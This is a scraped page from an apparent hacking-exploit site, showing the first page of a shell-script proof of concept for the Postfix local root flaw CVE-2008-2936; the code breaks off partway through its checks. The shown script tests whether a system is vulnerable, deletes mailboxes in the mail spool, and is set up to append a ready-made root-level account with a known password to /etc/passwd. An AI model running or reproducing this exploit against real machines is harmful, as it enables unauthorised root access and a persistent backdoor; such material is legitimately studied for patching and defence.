Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > Exploit > Content
Hot Articles
Joomla Component com_con
CMailServer 5.4.6 (CMail
AuraCMS
Boonex Dolphin 6.1.2 Mul
BoonEx Ray 3.5 (sIncPath
Maian Cart 1.1 Insecure
Dreampics Builder (page)
Joomla Component com_con
PhotoPost vBGallery 2.4.
MyBulletinBoard (MyBB)
Safari + Quicktime
Mole Group Last Minute S
Dreampics Builder (page)
Maian Music 1.0 Insecure
Maian Guestbook
Recommend Articles
Safari + Quicktime
CMailServer 5.4.6 (CMail
trixbox (langChoice) Loc
BrewBlogger 2.1.0.1 Arbi
Joomla Component com_con
Mole Group Last Minute S
BoonEx Ray 3.5 (sIncPath
Dreampics Builder (page)
Download Accelerator Plu
OllyDBG v1.10 and ImpREC
DreamNews Manager (id) R
gapicms 9.0.2 (dirDepth)
Million Pixels 3 (id_cat
Maian Cart 1.1 Insecure
Maian Music 1.0 Insecure
New Articles
Debian Sarge Multiple IM
Sagem Routers F@ST Remot
Many businesses underest
Brits travelling on busi
Secure Computing's Secur
Social networking sites
Poor Citrix implementati
Imperva WAM automates th
Adware is still a big pr
SANYO CCTV technology he
Hackers try to infect co
RF Barrier proactively d
DESlock+
DESlock+
DESlock+
Postfix
  Add date: 10/10/2008   Publishing date: 10/10/2008   Hits: 2
Total 2 pages, Current page:1, Jump to page:
 
#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#

# Config

writable_dir=/tmp
spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh"   # Pass is "dsrrocks"
postfix=`which postfix` # /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap


# Funcs

quit()
{
  echo "$1"
  exit
}


# Step 1: is my system vulnerable?

head -n 9 $0 | tail -n 8
if [ $postfix ] ; then
  echo "[*] Postfix seems to be installed"
else
  quit "[!] Are you sure Postfix is installed?"
fi

mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2

if [ -L $writable_dir/pocfix/dst2 ] ; then
  echo "[*] Hardlink to symlink not dereferenced"
  rm -rf $writable_dir/pocfix
else
  rm -rf $writable_dir/pocfix
  quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi

if [ -d $spool_dir -a -w $spool_dir ] ; then
  echo "[*] Spool dir is writable"
else
  quit "[!] Spool dir is not writable"
fi

if [ -e $spool_dir/$user ] ; then
  rm -f $spool_dir/$user
  echo "[*] Mailbox for \"$user\" found. Trying to delete it"

  if [ -e $spool_dir/$user ] ; then
    quit "[!] Couldn't delete it"
  else
    echo "[*] Deletion ok"
  fi

fi

if [ -e $spool_dir/$useful_link_dst ] ; then
  rm -f $spool_dir/$useful_link_dst
  echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"

  if [ -e $spool_dir/$useful_link_dst ] ; then
    quit "[!] Couldn't delete it"
  else
    echo "[*] Deletion ok"
  fi

fi

aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
  if [ $aliases ] ; then
    $postmap -q $user $aliases > /dev/null
    if [ $? -eq 0 ] ; then
      quit "[!] Mail alias for \"$user\" exists"
    fi
  fi
fi

lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
  quit "[!] Non-Postfix LDA detected"
fi

$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then

 
Other pages: : 1 * 2 * Next>>
Prev:Friendly Technologies Read/Write Registry/Read Files Exploit Next:Invision Power Board

Comment:

Category: Home > Exploit
Home